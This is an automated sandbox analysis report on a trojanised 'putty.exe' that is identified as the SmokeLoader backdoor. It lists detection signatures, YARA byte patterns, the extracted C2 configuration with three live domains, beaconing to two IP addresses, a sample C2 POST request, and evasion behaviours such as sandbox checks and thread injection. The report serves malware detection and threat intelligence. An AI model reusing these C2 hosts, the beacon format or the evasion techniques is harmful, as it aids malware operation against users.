Windows Analysis Report
putty.exe

Overview

General Information

Sample name: putty.exe
Analysis ID: 1578162
MD5: 3bbac642557b0ab934addbac0594561c
SHA1: 0787a06f1fff51bdfdb129186df44e73d8c7d5de
SHA256: bc887fcd6805824ac58a107917c6d083056d688eef39e979da25d16eb388e798

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • putty.exe (PID: 6380 cmdline: "C:\Users\user\Desktop\putty.exe" MD5: 3BBAC642557B0AB934ADDBAC0594561C)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • hajefwb (PID: 7112 cmdline: C:\Users\user\AppData\Roaming\hajefwb MD5: 3BBAC642557B0AB934ADDBAC0594561C)
  • hajefwb (PID: 3648 cmdline: C:\Users\user\AppData\Roaming\hajefwb MD5: 3BBAC642557B0AB934ADDBAC0594561C)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
Source | Rule | Description | Author | Strings
00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000000.00000002.2177513700.0000000002471000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
00000004.00000002.2439563956.00000000009E1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown | 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89

Source | Rule | Description | Author | Strings
4.3.hajefwb.890000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
4.2.hajefwb.880e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.2.putty.exe.940e67.1.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
0.3.putty.exe.950000.0.raw.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
4.2.hajefwb.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |

                System Summary

Source: Process started, Author: Max Altgelt (Nextron Systems), Data: Command: C:\Users\user\AppData\Roaming\hajefwb, CommandLine: C:\Users\user\AppData\Roaming\hajefwb, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hajefwb, NewProcessName: C:\Users\user\AppData\Roaming\hajefwb, OriginalFileName: C:\Users\user\AppData\Roaming\hajefwb, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\hajefwb, ProcessId: 7112, ProcessName: hajefwb

AV Detection

Source: putty.exe, Avira: detected
Source: http://constractionscity1991.lat/, Avira URL Cloud: Label: malware
Source: http://connecticutproperty.ru/, Avira URL Cloud: Label: malware
Source: http://restructurisationservice.ru/, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\hajefwb, Avira: detection malicious, Label: HEUR/AGEN.1312567
Source: 00000004.00000002.2439353004.0000000000890000.00000004.00001000.00020000.00000000.sdmp, Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
Source: C:\Users\user\AppData\Roaming\hajefwb, ReversingLabs: Detection: 47%
Source: putty.exe, Virustotal: Detection: 37%
Source: putty.exe, ReversingLabs: Detection: 47%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\hajefwb, Joe Sandbox ML: detected
Source: putty.exe, Joe Sandbox ML: detected
Source: putty.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\putty.exe, File opened: C:\Windows\SysWOW64\msvcr100.dll

                Networking

                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49735 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49747 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49741 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49741 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49897 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49902 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49908 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49920 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49920 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49933 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49928 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49915 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49953 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49926 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49928 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49933 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49947 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49947 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49977 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49902 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49973 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50000 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50000 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49993 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50019 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50026 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50028 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50012 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50002 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50015 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50021 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50021 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50017 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50006 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49970 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50014 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50032 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49964 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50003 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49995 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50019 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50032 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49914 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49939 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50035 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50001 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50007 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50016 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49995 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50020 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50005 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50022 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50022 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49958 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50010 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50011 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50011 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50034 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50009 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50009 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50027 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50036 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50013 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50008 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50025 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50031 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50008 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50031 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50024 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50024 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50018 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50030 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50033 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50030 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50037 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50029 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49942 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50033 -> 194.85.61.76:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49942 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50004 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50004 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:50023 -> 94.156.177.51:80
                Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:50023 -> 94.156.177.51:80
                Source: C:\Windows\explorer.exeNetwork Connect: 94.156.177.51 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 194.85.61.76 80Jump to behavior
                Source: Malware configuration extractorURLs: http://constractionscity1991.lat/
                Source: Malware configuration extractorURLs: http://restructurisationservice.ru/
                Source: Malware configuration extractorURLs: http://connecticutproperty.ru/
                Source: Joe Sandbox ViewIP Address: 94.156.177.51 94.156.177.51
                Source: Joe Sandbox ViewIP Address: 194.85.61.76 194.85.61.76
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | DNS traffic detected: DNS query: constractionscity1991.lat
                Source: global traffic | DNS traffic detected: DNS query: restructurisationservice.ru
                Source: global traffic | DNS traffic detected: DNS query: connecticutproperty.ru
                Source: unknown | HTTP traffic detected: POST / HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://ferxsaaokurf.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 367 | Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:58:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:58:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 09:59:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
